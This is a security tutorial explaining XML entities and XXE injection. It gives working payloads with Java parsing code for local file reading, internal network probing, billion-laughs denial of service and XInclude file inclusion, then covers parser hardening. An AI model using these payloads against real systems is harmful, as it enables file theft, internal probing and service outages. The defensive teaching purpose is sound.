How XML External Entity (XXE) Attacks Exploit DTDs and How to Defend Against Them

This article explains fundamental XML concepts, including DTDs and entity definitions; demonstrates common XXE attack scenarios (file reading, internal network probing, DoS, and XInclude exploitation) with Java code examples; and provides practical hardening techniques: disabling XInclude, DTD parsing, and external entity resolution.

MaGe Linux Operations

1 Basic Concepts

XML (Extensible Markup Language) is a plain‑text markup language designed for data transmission rather than presentation and is a W3C recommendation.

XML tags are user‑defined; an example XML document may contain title, sender, receiver and content elements.

DTD (Document Type Definition) defines the allowed structure of an XML document, including root element, ELEMENT, ATTLIST and ENTITY declarations.

An internal DTD is declared inline as <!DOCTYPE RootElementName [DTD content]>. For example, a DTD can specify that the XML file must have a root element persons containing person child elements, and which attributes those elements carry.

External DTD can be referenced with <!DOCTYPE RootElementName SYSTEM "DTDFileName">.

Entity definitions allow reuse of values. An entity is declared as <!ENTITY entityName "entity value"> and referenced in the document as &entityName;.

Entities are classified along two axes: parameter vs non‑parameter (general), and internal vs external. General entities are referenced as &name; and can be used in both the DTD and the document content, while parameter entities are declared with a % sign, referenced as %name;, and are usable only inside the DTD. Internal entities define the value directly; external entities obtain the value from a file or URL.
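As a minimal sketch of these categories, the following Java program parses a document that declares one internal general entity directly and a second one through a parameter entity. The class name, element name, and entity names (sender, receiver, extra) are illustrative assumptions, not part of the original article.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

final class InternalEntityDemo {

    // Parses a small document with internal entities and returns the root's text.
    static String expandEntities() throws Exception {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                   + "<!DOCTYPE note [\n"
                   // Internal general entity: usable in document content as &sender;
                   + "  <!ENTITY sender \"Alice\">\n"
                   // Parameter entity: usable only inside the DTD as %extra;
                   + "  <!ENTITY % extra \"<!ENTITY receiver 'Bob'>\">\n"
                   // Expanding %extra; here declares the general entity receiver.
                   + "  %extra;\n"
                   + "]>\n"
                   + "<note>&sender; to &receiver;</note>";
        DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
        Document doc = builder.parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(expandEntities()); // prints "Alice to Bob"
    }
}
```

Both entities here are internal, so nothing is read from disk or the network; the attack scenarios later in the article depend on the external variants.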

XML External Entity (XXE) Injection

XXE occurs when an XML parser processes external entities and the supplied XML can be controlled by an attacker, leading to information disclosure, command execution, denial‑of‑service, SSRF, internal port scanning, etc.

2 Common Attack Scenarios

2.1 Server File Read (Information Disclosure)

Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ELEMENT root (#PCDATA)>
    <!ENTITY pw SYSTEM "file:///D:/securetest/xxe/passwd.txt">
]>
<root>&pw;</root>

Java code that parses the payload:

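import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

public class XxeFileReadDemo {
    public static void main(String[] args) throws Exception {
        // Attacker-controlled XML: the external entity pw points at a local file.
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                   + "<!DOCTYPE root [\n"
                   + "\t<!ELEMENT root (#PCDATA)>\n"
                   + "\t<!ENTITY pw SYSTEM \"file:///D:/securetest/xxe/passwd.txt\">\n"
                   + "]>\n"
                   + "<root>&pw;</root>";
        // Default factory settings: DTDs and external entities are not disabled.
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating(true);
        DocumentBuilder builder = factory.newDocumentBuilder();
        InputStream in = new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8));
        Document document = builder.parse(in);
        Element rootElement = document.getDocumentElement();
        System.out.println("Root name: " + rootElement.getNodeName());
        // The expanded entity, i.e. the file contents, appears as the root's text.
        System.out.println("Root content: " + rootElement.getTextContent());
    }
}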

The result prints the contents of passwd.txt.

2.2 Internal Network Probing

Payload uses an external entity that points to an internal HTTP service:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ELEMENT root (#PCDATA)>
    <!ENTITY pw SYSTEM "http://127.0.0.1:3000/getInnerData">
]>
<root>&pw;</root>

Corresponding Java parsing code is similar to the previous example, and the output shows the response from the internal endpoint.

2.3 XML‑Based DoS (Entity Expansion)

Payload defines nested entities, each referencing the previous one several times, so that expansion grows exponentially:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ELEMENT root (#PCDATA)>
    <!ENTITY lol "lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol">
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<root>&lol6;</root>

When a Java parser expands these entities without limits, it consumes massive memory and CPU, demonstrating a DoS effect. Disabling or limiting entity expansion in the parser prevents it.
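The effect of an expansion limit can be sketched as follows, assuming the JDK's built-in JAXP parser, which enforces an entity expansion limit when XMLConstants.FEATURE_SECURE_PROCESSING is enabled. The payload is deliberately scaled down (a three-character base entity and five levels of ten references) so that it stays harmless even on a parser without limits; the class and method names are illustrative.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXException;

final class EntityExpansionLimitDemo {

    // Builds a nested-entity payload: e0 = "lol", and each of e1..e5 references
    // the previous entity ten times, so &e5; needs more than 100,000 expansions
    // but would yield only about 300 KB of text if no limit were enforced.
    static String buildPayload() {
        StringBuilder sb = new StringBuilder("<?xml version=\"1.0\"?>\n<!DOCTYPE root [\n");
        sb.append("  <!ENTITY e0 \"lol\">\n");
        for (int level = 1; level <= 5; level++) {
            sb.append("  <!ENTITY e").append(level).append(" \"");
            for (int i = 0; i < 10; i++) {
                sb.append("&e").append(level - 1).append(';');
            }
            sb.append("\">\n");
        }
        sb.append("]>\n<root>&e5;</root>");
        return sb.toString();
    }

    // Returns true if the parser refused the document, false if it parsed it fully.
    static boolean isRejected(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Ask the implementation to apply its processing limits.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        try {
            factory.newDocumentBuilder()
                   .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            // The limit violation surfaces as a fatal parse error.
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("Rejected: " + isRejected(buildPayload()));
    }
}
```

The exact limit and error message depend on the JDK version and on any limit properties configured for the JVM, so the sketch only checks that parsing is refused.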

2.4 XInclude Exploitation

Even when DTD is disabled, enabling XInclude can allow inclusion of external files:

<?xml version="1.0" encoding="UTF-8"?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include href="file:///D:/securetest/xxe/passwd.txt" parse="text"/>
</root>

Java parser configuration:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setNamespaceAware(true);
factory.setXIncludeAware(true);

Parsing this XML prints the contents of the included file.
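The configuration above can be exercised end to end with a short sketch. To stay self-contained, it writes a temporary file and points xi:include at that file instead of the D:/securetest path used in the article; the class name, method name, and file content are assumptions made for illustration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

final class XIncludeDemo {

    // Parses a DOCTYPE-free document whose xi:include points at `target`
    // and returns the text content of the root element.
    static String parseRootText(Path target, boolean xincludeAware) throws Exception {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                   + "<root xmlns:xi=\"http://www.w3.org/2001/XInclude\">"
                   + "<xi:include href=\"" + target.toUri() + "\" parse=\"text\"/>"
                   + "</root>";
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // DTDs are rejected outright, yet XInclude is a separate mechanism.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setNamespaceAware(true);
        factory.setXIncludeAware(xincludeAware);
        Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        Path secret = Files.createTempFile("xinclude-demo", ".txt");
        try {
            Files.write(secret, "secret-value".getBytes(StandardCharsets.UTF_8));
            System.out.println("XInclude on:  [" + parseRootText(secret, true) + "]");
            System.out.println("XInclude off: [" + parseRootText(secret, false) + "]");
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

With XInclude awareness switched off, the xi:include element is treated as an ordinary empty element, so the file is never read.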

3 Secure Coding Practices

3.1 Disable XInclude

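Do not enable XInclude in XML parsers unless the application genuinely needs it. DocumentBuilderFactory leaves XInclude off by default; the following calls turn it on and should appear only where XInclude processing is required:

factory.setNamespaceAware(true);
factory.setXIncludeAware(true);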

3.2 Disable DTD Parsing

When DTD is not required, disable it completely, e.g.:

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
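A minimal sketch of the effect, assuming the JDK's built-in parser: once the feature is set, any document that carries a DOCTYPE declaration is refused with a parse error, while DOCTYPE-free documents are parsed as usual. The class and method names are illustrative.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXParseException;

final class DisallowDoctypeDemo {

    // Returns true if the parser refused the document, false if it parsed it.
    static boolean isRejected(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        try {
            factory.newDocumentBuilder()
                   .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXParseException e) {
            // Raised as soon as the parser encounters the DOCTYPE declaration.
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        String withDtd = "<!DOCTYPE root [<!ENTITY x \"y\">]><root>&x;</root>";
        String withoutDtd = "<root>plain</root>";
        System.out.println("With DOCTYPE rejected:    " + isRejected(withDtd));    // true
        System.out.println("Without DOCTYPE rejected: " + isRejected(withoutDtd)); // false
    }
}
```

Because the DTD is never processed, entity declarations of any kind (internal, external, or parameter) never take effect.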

3.3 Disable External Entity Resolution

Either disable external entities globally:

factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

or provide a custom EntityResolver that returns an empty source:

builder.setEntityResolver(new EntityResolver() {
    @Override
    public InputSource resolveEntity(String publicId, String systemId) {
        return new InputSource(new StringReader(""));
    }
});
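The first option can be sketched as a small factory helper plus a check that an external file entity is no longer read. The helper name newHardenedFactory, the temporary file, and its content are assumptions made for illustration; the feature URIs are the ones listed above.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;

final class HardenedParserDemo {

    // Builds a factory with external entity and external DTD loading switched off.
    static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        return factory;
    }

    // Parses an XXE-style payload whose external entity points at `target`
    // and returns the text content of the root element.
    static String parseRootText(Path target) throws Exception {
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                   + "<!DOCTYPE root [\n"
                   + "  <!ENTITY pw SYSTEM \"" + target.toUri() + "\">\n"
                   + "]>\n"
                   + "<root>&pw;</root>";
        Document doc = newHardenedFactory().newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(secret, "secret-value".getBytes(StandardCharsets.UTF_8));
            // The entity reference is skipped, so the file content does not appear.
            System.out.println("Root content: [" + parseRootText(secret) + "]");
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Centralizing the settings in one helper means every parser in the codebase is created the same way, which is easier to audit than per-call configuration.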

4 Automated Security Scanning

IoT platforms integrate these XML security rules into automated pipelines to ensure production services are protected.
